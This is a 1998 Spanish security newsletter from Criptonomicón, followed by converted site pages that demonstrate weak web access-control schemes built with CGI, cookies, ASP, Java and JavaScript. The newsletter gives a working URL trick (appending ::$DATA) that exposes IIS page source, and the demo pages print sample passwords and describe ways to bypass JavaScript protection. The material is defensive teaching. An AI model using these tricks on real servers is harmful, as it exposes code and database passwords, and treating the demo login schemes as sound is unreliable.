Boletn del Criptonomicn


Ao I, n 11
6 de julio de 1998
******************************************
Este fin de semana el Web de Microsoft ha sido penetrado por hackers de todo el mundo que
han sido capaces de ver los cdigos fuente de las pginas .asp (Active Server Pages) y
.pl (escritas en Perl). Ha sido uno de los golpes ms duros para su imagen y para su
privacidad en estos ltimos meses.
*******************************************
En este boletn:
1.
2.
3.
4.
5.
6.
7.
8.

Hackers de todo el mundo entran el servidor web de Microsoft


Agujero de seguridad en ASP
Fracaso de los planes criptogrficos de la Casa Blanca
Nuevo boletn sobre seguridad editado por Bruce Schneier
Requisitos de seguridad para las extensiones del servidor Microsoft FrontPage
Bug en servidores Web que permite ver cdigo fuente
Compaq lanza el mdulo Fingerprint ID para PCs
Informacin sobre suscripcin y cmo borrarse

******************************************
1. Hackers de todo el mundo entran el servidor web de Microsoft
EXCLUSIVA! Un grupo de hackers descubri el pasado jueves una grave fisura de
seguridad en el servidor web de Microsoft y obtuvo los cdigos fuente (o claves
informticas) de las pginas activas en el servidor, realizadas en asp y perl,
pudiendo obtener, de este
modo, informacin confidencial y contraseas de acceso a bases de datos de Microsoft.
Analizando estos cdigos fuente, los intrusos
informticos pueden entrar en los servidores web NT que no hayan adoptado en los ltimos
das extremas medidas de seguridad. Alrededor del 40 % de servidores web en Internet
utiliza esta plataforma.
Microsoft ha enviado un boletn especial a un buen nmero de
administradores de sistemas, reconociendo el hecho e instndoles a adoptar
extraordinarias medidas de seguridad. La fisura descubierta por los hackers se comprobaba
colocando los signos ::$DATA despus de marcar una direccin de cualquier pgina en
asp. En ese momento se abra una ventana que permita acceder a los cdigos fuente de
las pginas del servidor, segn pudo comprobar directamente La Brjula.
El descubrimiento se difundi por todo el mundo a las 18.24 hora
espaola, 6.24 AM Pacific, y doce horas despus, a las 6.15 hora
espaola, Microsoft difundi una comunicacin especial advirtiendo del hecho. En esas
doce horas de diferencia, cientos de programadores de todo el mundo descargaron ficheros
de Microsoft, as como de otros servidores con idnticos problemas de seguridad. La
compaa de Bill Gates tambin ha habilitado un sitio web:
http://www.microsoft.com/security
facilitando la informacin. La
noticia de este bug, que ha sido recogida tambin por News.com y Wired, ocupa en estos
das la atencin de miles de programadores
mundiales. Consitituye, asimismo, uno de los fallos de seguridad ms graves de Microsoft
en los ltimos meses.
(Tomado de LABRUJULA.NET Domingo, 5 julio 1998 y reproducido con el permiso de Mikel
Amigot. Ms informacin en http://www.imssa.es/)
******************************************
2. Agujero de seguridad en ASP

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt (1 of 4) [25/10/2000 02:32:09 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt

Debido a la importancia de este agujero, que no slo afecta a los servidores de


Microsoft, sino a todos los que utilicen pginas ASP, doy a continuacin ms detalles
sobre el mismo.
Basta con aadir "::$DATA" a continuacin de
"Direccin"de nuestro navegador, para que en
de servidor activa (ASP), se descargue en un
resultado de su ejecucin. Si en vuestro Web
.asp, podis hacer la prueba, escribiendo:

una direccin URL en la ventanita


vez de ejecutarse en el servidor la pgina
fichero su cdigo fuente, en vez del
se encuentra alguna pgina de extensin

http://www.tuservidor.es/tupagina.asp::$DATA
y obtendris el fichero fuente, no la pgina producida por su ejecucin.
Son vulnerables a este ataque los ficheros con las extensiones .inc, .idc, .stm, .asp,
.asa, .shtm, .shtml y .pl en servidores NT con IIS.
Si se tiene en cuenta que estas pginas se suelen utilizar para autenticacin y control
de acceso, as como para gestin y consultas de bases de datos y que muchas veces en
ellas se encuentran codificados los ficheros de claves o incluso las mismas claves, la
obtencin del cdigo fuente nos puede permitir hacernos con dichas claves y acceder a los
servicios que protegen.
Por este motivo, resulta de extrema importancia que los administradores que utilicen
pginas activas ASP para proteger sus recursos parcheen el fallo.
Para una descripcin detallada del agujero podis acudir a:
http://www.activeserverpages.com/security/
http://www.zdnet.com/wsources/content/0798/ntnd_asp_hole.html
Podis encontrar distintos parches en las siguientes direcciones:
http://www.softwing.com/iisdev/ddatafix/
http://www.microsoft.com/security/bulletins/ms98-003.htm
******************************************
3. Fracaso de los planes criptogrficos de la Casa Blanca
Una comisin del gobierno no ha conseguido, en dos aos de trabajo,
disear un sistema federal de seguridad informtica que incluyera
"puertas traseras", una caracterstica que posibilitara la vigilancia
de los servicios de inteligencia, segn han reconocido a Reuters
fuentes cercanas a la citada comisin.
Este fracaso proyecta nuevas dudas sobre la poltica de la Casa Blanca
partidaria de incluir dichas "puertas traseras" en las tecnologas de
cifrado utilizadas para proteger las comunicaciones.
Sin embargo, representantes de la administracin intentaron quitar
hierro al asunto y se limitaron a decir que la comisin necesita ms
tiempo, pues su plan de accin termina este mes de julio.
"No dira que el tema est terminado de ninguna forma", ha dicho el
Subsecretario de Comercio William Reinsch. "Evidentemente, es una
tarea difcil".
La comisin, compuesta por 22 expertos, fue constituida en 1996 y la
semana pasada realiz una reunin en la que se constat que no ha
podido superar los obstculos tcnicos existentes para crear la

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt (2 of 4) [25/10/2000 02:32:09 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt

infraestructura a gran escala que necesitaran los servicios de


inteligencia para sus tareas de vigilancia.
El grupo tena la misin de elaborar un plan para el gobierno, llamado
"Estndar Federal para el Procesamiento de Informacin" o FIPS, que
detallara cmo deben las agencias del gobierno desarrollar sistemas
con "puertas traseras".
En una carta dirigida al Secretario de Comercio William Daley,
obtenida por Reuters, la comisin le deca que "hemos encontrado
algunos problemas tcnicos importantes que, si no se resuelven,
impiden el desarrollo de un FIPS til".
"Puesto que el centro de este trabajo es la seguridad, creemos que es
extremadamente importante que hagamos un documento que sea completo,
coherente y exhaustivo a la hora de abordar las muchas facetas de esta
compleja tecnologa de seguridad", dice la carta. "El documento
adjunto no satisface estos criterios".
El grupo es conocido formalmente como Comit Tcnico Asesor para el
Desarrollo de un Estdar Federal de Procesamiento de Informacin para
la Infraestructura Federal de Gestin de Claves, pero su acrnimo es
tan impronunciable (TACDFIPSFKMI) que los miembros del mismo se
refieren a l como "Bob", lo cual da a todo este asunto una nota de
humor.
El fracaso de "Bob" viene a dar la razn a los crticos de la poltica
criptogrfica de la Administracin, ha dicho Alan Davidson, del Center
for Democracy and Technology (http://www.cdt.org).
La Administracin y las agencias de seguridad han venido siendo
criticadas por las compaas de Internet, los grupos de usuarios y de
defensa de las libertades civiles, as como por grupos profesionales y
de cientficos. Durante aos han venido manteniendo una batalla
dialctica constante que se ha expresado en la reivindicacin de la
eliminacin de todo tipo de controles sobre los productos
criptogrficos, la oposicin a cualquier sistema de depsito de claves
y la eliminacin de todo intento de vigilancia mediante la instalacin
de "puertas traseras" en el software de cifrado. Sin embargo, el
gobierno sigue sin dar su brazo a torcer.
Bruce Schneier, un investigador criptogrfico de gran prestigio en el
pas, ha dicho que la comisin de FIPS ha fracasado porque es
imposible cumplir simultneamente las necesidades de la polica y de
la industria. Y de los usuarios, aadimos nosotros.
(Reproducido con permiso de FrEE Fronteras Electrnicas, http://www.arnal.es/free/)
******************************************
4. Nuevo boletn sobre seguridad editado por Bruce Schneier
Bruce Schneier, autor del celebrrimo libro "Applied Cryptography", considerado por
muchos como la biblia de la Criptografa, acaba de crear un boletn electrnico sobre
seguridad, llamado Crypto-gram. Si estis interesados en suscribiros a l o revisar su
primer nmero, podis acudir a:
http://www.counterpane.com/crypto-gram.html
******************************************
5. Requisitos de seguridad para las extensiones del servidor Microsoft FrontPage

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt (3 of 4) [25/10/2000 02:32:09 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt

Las extensiones de FrontPage mal configuradas podran llegar a exponer tus datos o
incluso todo tu servidor Web a riesgos innecesarios. Puedes aprender acerca de cules son
los problemas de seguridad ms comunes de FrontPage y cmo identificarlos y corregirlos
en:
http://www.developer.com/journal/techworkshop/070298_frontpage.html
******************************************
6. Bug en servidores Web que permite ver cdigo fuente
Un grupo de programadores de San Diego Source, del servicio de noticias en lnea del San
Diego Daily Transcript, ha descubierto un agujero de seguridad que afecta al software de
servidor de Netscape Communications y de la compaa de software y editora de libros
O'Reilly & Associates.
El fallo, que permite presentar cdigo confidencial de programas en versiones de Netscape
Enterprise y de WebSite Professional de O'Reilly & Associates para Windows NT y Windows
95, puede ser explotado por los hackers para obtener informacin que los programadores
consideran de otra forma inaccesible, como passwords de bases de datos, nombres de
usuario e incluso cdigo de programa que provoca la activacin de ciertos eventos pero no
que est pensado para que lo vea el pblico.
Ms informacin en:
http://www.sddt.com/files/library/98/06/25/tbc.html
******************************************
7. Compaq lanza el mdulo Fingerprint ID para PCs
Compaq Computer ha lanzado un pequeo mdulo hardware para utilizar en PCs de sobremesa
que permitira a los usuarios entrar en mquinas Windows usando una exploracin de la
huella digital. Como en las pelculas de James Bond.
Ms datos en:
http://www.pcworld.com/cgi-bin/pcwtoday?ID=7309
******************************************
8. Informacin sobre suscripcin y cmo borrarse
Para borrarse de este servicio basta con enviar un correo a la direccin
cripto-request@iec.csic.es con el siguiente mensaje (sin asunto o "subject"):
leave
desde la misma cuenta de correo en la que recibs el boletn.
Tenis ms informacin en la pgina
http://www.iec.csic.es/criptonomicon/suscripcion.html
******************************************
(C) Copyright 1998 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC por
Gonzalo lvarez Maran
email: gonzalo@iec.csic.es

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt (4 of 4) [25/10/2000 02:32:09 p.m.]

Ejemplo de control de acceso en CGI

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Ejemplo de control de acceso en CGI


En esta pgina se muestra un ejemplo sencillo de control de
acceso en el que se nos solicita el nombre de usuario y la clave
de acceso para acceder a una pgina en concreto, cuyo nombre
est codificado en el programa CGI (en este caso, nos lleva
sencillamente a la pgina de portada, siempre y cuando la
informacin de autenticacin sea correcta).

Nombres

Localizacin

JavaScript

Java
CGI
ASP
Java

CGI

JavaScript

Cookies

Limitaciones

Por favor, introduce el nombre de usuario y la clave de acceso


Nombre:

Crashes

Clave:
Agujeros

Confirmar
Spam

Nota: el nombre de acceso es conan y la clave, cimmeria.


Remailers

Anonimato

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Correo seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejcgi.html (1 of 2) [25/10/2000 02:32:10 p.m.]

Ejemplo de control de acceso en CGI


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejcgi.html (2 of 2) [25/10/2000 02:32:10 p.m.]

Ejemplo de control de acceso en CGI

Suscripcin gratis

Intimidad?

Artculos

Ejemplo de control de acceso en CGI


Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

En esta pgina se muestra cmo se pueden almacenar en una


cookie el nombre de usuario y su clave para acceder a un sitio
Web, de manera que no se nos vuelvan a pedir cada vez que
intentamos ver alguna pgina protegida. Es requisito
imprescindible que se acepte la cookie cuando nos la envan, ya
que el proceso de autencticacin tiene lugar una sola vez y si se
produce con xito, el nombre de usuario y la clave se guardarn
en la cookie. As, en el futuro, cada vez que se desee acceder a
algn servicio protegido, se comprobar que existe la cookie y
que la informacin acerca del usuario es correcta, garantizando
en tal caso el acceso, sin necesidad de atravesar de nuevo el
proceso de autenticacin.

Por favor, introduce el nombre de usuario y la


clave de acceso

Nombres

Localizacin

JavaScript

Java

ASP

CGI

Limitaciones

Nombre:
Crashes

Clave:
Agujeros

Confirmar
Spam

Nota: el nombre de acceso es conan y la clave, cimmeria.


Remailers

Anonimato

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Correo seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/cgicookie.html (1 of 2) [25/10/2000 02:32:10 p.m.]

Ejemplo de control de acceso en CGI


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/cgicookie.html (2 of 2) [25/10/2000 02:32:10 p.m.]

Cmo restringir el acceso a pginas Web - Coleccin de imgenes

Suscripcin gratis

Intimidad?

Artculos

Coleccin de imgenes

Seguridad

Linux

Navegacin segura

Abajo tienes la coleccin de imgenes del fantstico pintor


romntico prerrafaelista John Waterhouse. Puedes pichar en las
imgenes pequeas para verlas ampliadas. Si no puedes
visualizarlas porque te aparece un mensaje de error de
autenticacin, pasa antes por la pgina de autenticacin en la que
se te mandar una cookie con el nombre de usuario y la clave.

Control de acceso

CGI

Localizacin

JavaScript

Java

The Lady of Shalott

Java

JavaScript

Nombres

ASP

CGI

Limitaciones

The Tempest

Cookies

Crashes

Agujeros

La Belle Dame sans Merci

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Es importante notar que los ficheros con las imgenes pueden encontrarse en
cualquier posicin del rbol de directorios del servidor, no necesariamente en el rea
documentos del servidor Web. Se puede definir la posicin dentro de la estructura de
directorios donde se encuentran almacenadas las imgenes de forma tal que no sean
accesibles a travs de la Web. De esta forma, se consigue aislar completamente el
lugar fsico donde se guardan las imgenes del servidor Web. En estas circunstancias,
resulta completamente imposible enlazar directamente a las imgenes, sin pasar antes
por el proceso de autenticacin. Por supuesto, este proceso puede aplicarse no slo a
imgenes, sino tambin a textos, documentos PDF, sonidos, vdeos, etc.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/imagenes.html (1 of 2) [25/10/2000 02:32:11 p.m.]

Cmo restringir el acceso a pginas Web - Coleccin de imgenes


Consejos prcticos

Referencias

Libro de Visitas

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/imagenes.html (2 of 2) [25/10/2000 02:32:11 p.m.]

401 Authorization Required

Authorization Required
This server could not verify that you are authorized to access the document you requested. Either you
supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply
the credentials required.

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/error.html [25/10/2000 02:32:11 p.m.]

Pgina de acceso restringido en ASP

Suscripcin gratis

Intimidad?

Artculos

Pgina protegida mediante ASP

Seguridad

Linux

Identifquese, por favor

Nombres

Localizacin
Navegacin segura

Control de acceso

CGI

Java

Va a acceder a un servicio restringido para el que es necesario que


se identifique:
Nombre de
usuario:
Clave de
acceso:
Entrar

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejasp.asp.htm (1 of 2) [25/10/2000 02:32:11 p.m.]

JavaScript

Java

ASP

CGI

Limitaciones

Pgina de acceso restringido en ASP


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejasp.asp.htm (2 of 2) [25/10/2000 02:32:11 p.m.]

Pgina de acceso restringido en ASP con cookies

Suscripcin gratis

Intimidad?

Artculos

Pgina protegida mediante ASP y cookies

Seguridad

Linux

Identifquese, por favor

Nombres

Localizacin
Navegacin segura

Control de acceso

CGI

Java

Va a acceder a un servicio restringido para el que es necesario que


se identifique:
Nombre de
usuario:
Clave de
acceso:
Entrar

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/aspcookie.asp.htm (1 of 2) [25/10/2000 02:32:12 p.m.]

JavaScript

Java

ASP

CGI

Limitaciones

Pgina de acceso restringido en ASP con cookies


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/aspcookie.asp.htm (2 of 2) [25/10/2000 02:32:12 p.m.]

Ejemplo de control de acceso con Java

Suscripcin gratis

Intimidad?

Artculos

Ejemplo de control de acceso con Java

Seguridad

En este ejemplo, un applet de Java nos sirve para proteger el acceso.


Linux

Navegacin segura

Control de acceso

CGI

Si no tienes Java activado, esto no va a funcionar, me temo.


Bsicamente, se repiten los pasos descritos para JavaScript:
Nombres
1. Leer la palabra clave introducida por el usuario.
Localizacin
2. Intentar abrir la pgina correspondiente al URL construido
a partir de la clave.
JavaScript
3. Si el URL no se corresponde con una pgina existente, se
devolver un mensaje de error, en caso contrario, se
Java
transportar al usuario a la pgina protegida.

Java

JavaScript

Cookies

Crashes

Y por lo tanto, est sujeta a las mismas limitaciones, es decir, la


posibilidad de listar directorios, con lo cual se acab el secreto, y
la posibilidad de enlazar directamente a la pgina una vez que su
direccin es conocida.

ASP

CGI

Limitaciones

Si estis interesados, tambin podis examinar el cdigo fuente de


esta applet, debida a John Eriksson, para hacer modificaciones o adaptarla para
vuestro Web.

Agujeros

Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/applet.html (1 of 2) [25/10/2000 02:32:12 p.m.]

Ejemplo de control de acceso con Java


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/applet.html (2 of 2) [25/10/2000 02:32:12 p.m.]

Ejemplo de control de acceso con Java - Codelink

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Ejemplo de control de acceso con Java:


Codelink
Riada Lock es una aplicacin escrita en Java que gestiona listas de
control de acceso, permite mantener un logging de intentos de
acceso fallidos y otros rasgos. Puedes probar cmo funciona en el
siguiente ejemplo. En este caso la clave secreta es: Ab12345.

Nombres

Localizacin

Es una versin sofisticada de la applet del primer ejemplo en


cuanto a interfaz con el usuario, pero en cuestin de seguridad no
aade nada.

JavaScript

Si os gusta este producto, podis bajaros la versin de evaluacin


(la que yo he utilizado) desde la Web de Silk Webware.

ASP

Java

CGI
JavaScript
Limitaciones
Cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Consejos prcticos

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/codelink.html (1 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplo de control de acceso con Java - Codelink

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/codelink.html (2 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplo de control de acceso con Java - Riada Lock

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Ejemplo de control de acceso con Java:


Riada Lock
Riada Lock es una aplicacin escrita en Java que gestiona listas de
control de acceso, permite mantener un logging de intentos de
acceso fallidos y otros rasgos. Puedes probar cmo funciona en el
siguiente ejemplo. El nombre es conan y la clave, cimmeria.
En realidad, el interfaz y el funcionamiento interno es el mismo
que el del primer ejemplo. Los cambios que introduce este
esquema es que se codifican separadamente las personas que
pueden acceder a cada pgina mediante un interfaz amigable de
configuracin.
Si os gusta este producto, podis bajaros la versin de evaluacin
(la que yo he utilizado) desde la Web de Riada.

Nombres

Localizacin

JavaScript

Java

ASP

CGI

Limitaciones
Cookies

Crashes

Agujeros

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/riada.html (1 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplo de control de acceso con Java - Riada Lock


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/riada.html (2 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplos de control de acceso

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Ejemplos de control de acceso en


JavaScript
Este ejemplo muestra la proteccin ms fcil de romper, la
verdad, que casi no puede hablarse de proteccin de fcil que es.
Cuando accedas a esa pgina, encontrars en el propio cdigo
HTML los comentarios de cmo funciona.

Control de acceso

Nota: no te doy la clave porque es tan fcil de encontrar que no merece la


pena que insulte a tu inteligencia proporcionndotela.

Nombres

Localizacin

JavaScript

CGI

Java

Java

ASP

CGI

JavaScript

Limitaciones
Cookies

Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada3.html (1 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplos de control de acceso


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada3.html (2 of 2) [25/10/2000 02:32:13 p.m.]

Ejemplo malsimo de proteccin

Suscripcin gratis

Intimidad?

Artculos

Ejemplo muy malo en JavaScript

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Como os habris dado cuenta, puesto que estis leyendo estas


lneas, la proteccin de esta pgina es realmente ridcula, ya que
basta con desactivar JavaScript para entrar aqu sin problemas.
Otros trucos que podrais haber utilizado: pinchar con el botn
derecho en el enlace "fcil de romper" y elegir la opcin de abrir
en ventana nueva u otro ms sofisticado, hacer un telnet al puerto
80 de este servidor y pedir esta pgina, de manera que podis
examinarla.

Nombres

Localizacin

JavaScript

Java

ASP

Moraleja: nunca se debe dejar la clave dentro del cdigo fuente de


manera que est a la vista de cualquiera que se moleste en (o sepa
CGI
cmo) editar el origen de la pgina, para lo cual no hace falta ser
una lumbrera (basta con pulsar Ctrl+U en Netscape o acudir al
Limitaciones
consabido men de "Ver"). Aunque parezca mentira, existen sitios
en la Web que utilizan un sistema de proteccin como el que acabo de describir.

Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Spam

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejmalo.html (1 of 2) [25/10/2000 02:32:14 p.m.]

Ejemplo malsimo de proteccin


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/ejmalo.html (2 of 2) [25/10/2000 02:32:14 p.m.]

Pgina protegida

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Pgina protegida
Aqu podras incluir los contenidos que deseas proteger, como
texto, imgenes o lo que sea.

Navegacin segura

Nombres

Localizacin

Control de acceso

JavaScript

CGI

Java

Java

ASP

CGI

JavaScript

Limitaciones
Cookies

Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Spam

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/secretitos.html (1 of 2) [25/10/2000 02:32:14 p.m.]

Pgina protegida
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/secretitos.html (2 of 2) [25/10/2000 02:32:14 p.m.]

Ejemplo bueno de control de acceso en JavaScript

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Ejemplo bueno de control de acceso en


JavaScript
Desde esta pgina podrs acceder a la pgina con contenidos
reservados, por supuesto, slo si conoces la clave (a no ser que
seas muy listo, claro).

Control de acceso

Edita el cdigo de esta pgina, donde encontrars explicaciones


de cmo funciona esta proteccin en el propio cdigo.

CGI

Nota: si te rindes, la clave de acceso es secretitos.

Nombres

Localizacin

JavaScript

Java

ASP

Java

CGI

JavaScript

Limitaciones
Cookies

Crashes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada.html (1 of 2) [25/10/2000 02:32:15 p.m.]

Ejemplo bueno de control de acceso en JavaScript


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada.html (2 of 2) [25/10/2000 02:32:15 p.m.]

Control de acceso en JavaScript

Suscripcin gratis

Intimidad?

Artculos

Control de acceso en JavaScript


Seguridad

Linux

Navegacin segura

Control de acceso

Desde esta pgina podrs acceder a varias pginas con contenidos


reservados, utilizando la misma clave para todas ellas (en este
caso, la clave es reservado):
Cmo encontrar una aguja en un pajar.

Listado de nmeros secretos.

Lugares donde la birra cuesta cinco duros (y est muy


buena).

CGI

Nombres

Localizacin

JavaScript

Java

ASP

Java

CGI

Limitaciones

JavaScript

Cookies

Crashes

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Agujeros

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada2.html (1 of 2) [25/10/2000 02:32:15 p.m.]

Control de acceso en JavaScript


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/acceso/entrada2.html (2 of 2) [25/10/2000 02:32:15 p.m.]

Cookies - Ejemplo en ASP para ver todas tus cookies

Principal
Qu son
Riesgos

Un paseo por tus cookies


Estas son todas tus cookies a las que puedo tener acceso:
Si quieres, puedes examinar el cdigo fuente.

Usos
A dieta

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Ejemplos

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Recursos

file:///C|/TEMP/criptonomicon/criptonomicon/cookies/cookies.asp.htm [25/10/2000 02:32:16 p.m.]

Cookies - Ejemplo en ASP para ver todas tus cookies

Principal
Qu son

Cdigo fuente de "Un paseo por tus


cookies"

Riesgos

<% For Each cookie In Request.Cookies %>

Usos

<li>Cookie: <b> <% = cookie %> </b> = <% = Request.Cookies(cookie) %>


<ul> <% For Each key in Request.Cookies(cookie) %>

A dieta

<li>La clave: <b><% = key %></b> es <% = Request.Cookies(cookie)(key) %>

Ejemplos

<% Next %> </li>

Recursos

</ul>
<% Next %> </li>
</ul>

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

